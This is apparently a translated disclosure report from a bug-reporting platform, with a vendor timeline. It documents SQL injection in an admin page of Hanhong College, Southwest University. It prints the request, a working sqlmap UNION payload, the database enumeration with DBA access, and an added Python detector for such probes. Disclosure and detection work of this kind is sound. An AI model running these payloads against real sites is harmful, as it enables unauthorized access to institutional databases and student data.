2015-11-27: Details sent to the vendor, awaiting vendor response
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and relevant domain experts
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public
As the title says: SQL injection exists in many places, far too many to list, so only one is shown here.
http://hanhong.swu.edu.cn/ Hanhong College, Southwest University (西南大学含弘学院)
GET /admin/xuesheng_add.php?id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20id%20in%20%3Cb%3E/opt/lampp/htdocs/admin/xuesheng.php%3C/b%3E%20on%20line%20%3Cb%3E109%3C/b%3E%3Cbr%20/%3E&name=-1&nianfen=2015 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://hanhong.swu.edu.cn
Cookie: PHPSESSID=qg09on74i0001f1l8tlvv64ai7
Host: hanhong.swu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The name parameter is injectable.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=<br /><b>Notice</b>: Undefined variable: id in <b>/opt/lampp/htdocs/admin/xuesheng.php</b> on line <b>109</b><br />&name=-1' UNION ALL SELECT NULL,CONCAT(0x717a706271,0x434f6671537576784f76565049554f62784a59666853777563714676696467546547447461744b74,0x7171627671),NULL-- -&nianfen=2015
---
web application technology: PHP 5.6.8, Apache 2.4.12
back-end DBMS: MySQL 5.1
current user: 'hanhong@localhost'
current database: 'hanhong'
current user is DBA: True
available databases [7]:
[*] cdcol
[*] hanhong
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
There is no injection protection at all; several injection techniques work, and UNION query was chosen simply because it is the fastest.
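The request above also shows that the site's PHP notices (with the server path) were leaking into a parameter that the scanner then fed back as input. As an added example that is not part of the original report, the following check flags request lines carrying the UNION-probe markers seen in the sqlmap payload (UNION ALL SELECT, hex CONCAT sentinels, a trailing comment) or leaked PHP error text; the sample log lines are constructed from the report's request and are not captured traffic.

```python
"""Added check (not from the original report): flag request lines whose query
parameters carry UNION-injection probe markers or leaked PHP error text."""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit

# Markers a UNION probe leaves in a parameter value: UNION [ALL] SELECT with NULL
# padding, hex-literal CONCAT() sentinels used to locate echoed columns, a trailing
# SQL comment (-- - or #), and a PHP notice showing display_errors is switched on.
MARKERS = {
    "union-select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "hex-concat-marker": re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]+", re.I),
    "comment-tail": re.compile(r"(?:--[\s-]*|#\s*)$"),
    "leaked-php-notice": re.compile(r"Undefined variable|<b>/[^<]*\.php</b>"),
}

def suspicious_params(request_line):
    """Map each suspicious query parameter to the list of markers found in it."""
    target = request_line.split(" ")[1]  # "GET <target> HTTP/1.1"
    findings = {}
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        reasons = [name for name, rx in MARKERS.items() if rx.search(value)]
        if reasons:
            findings[key] = reasons
    return findings

def scan_request_log(lines):
    """Return [(line_number, findings)] for every request line that trips a marker."""
    hits = []
    for number, line in enumerate(lines, start=1):
        found = suspicious_params(line)
        if found:
            hits.append((number, found))
    return hits

# Constructed sample request lines modelled on the report: one normal lookup and
# one UNION probe whose id parameter carries the leaked PHP notice (hex shortened).
PROBE_QUERY = urlencode({
    "id": '<br /><b>Notice</b>: Undefined variable: id in <b>/opt/lampp/htdocs/admin/xuesheng.php</b> on line <b>109</b><br />',
    "name": "-1' UNION ALL SELECT NULL,CONCAT(0x717a706271,0x4f76,0x7171627671),NULL-- -",
    "nianfen": "2015",
})
SAMPLE_LOG = [
    "GET /admin/xuesheng_add.php?id=12&name=zhang&nianfen=2015 HTTP/1.1",
    "GET /admin/xuesheng_add.php?" + PROBE_QUERY + " HTTP/1.1",
]

if __name__ == "__main__":
    for number, found in scan_request_log(SAMPLE_LOG):
        print(number, found)
```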
Pulling the data out is trivial... and with DBA privileges, you know what that means.
One last reminder: SQL injection exists in multiple places.
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-11-27 15:12
The responsible unit has been notified, thank you!
None yet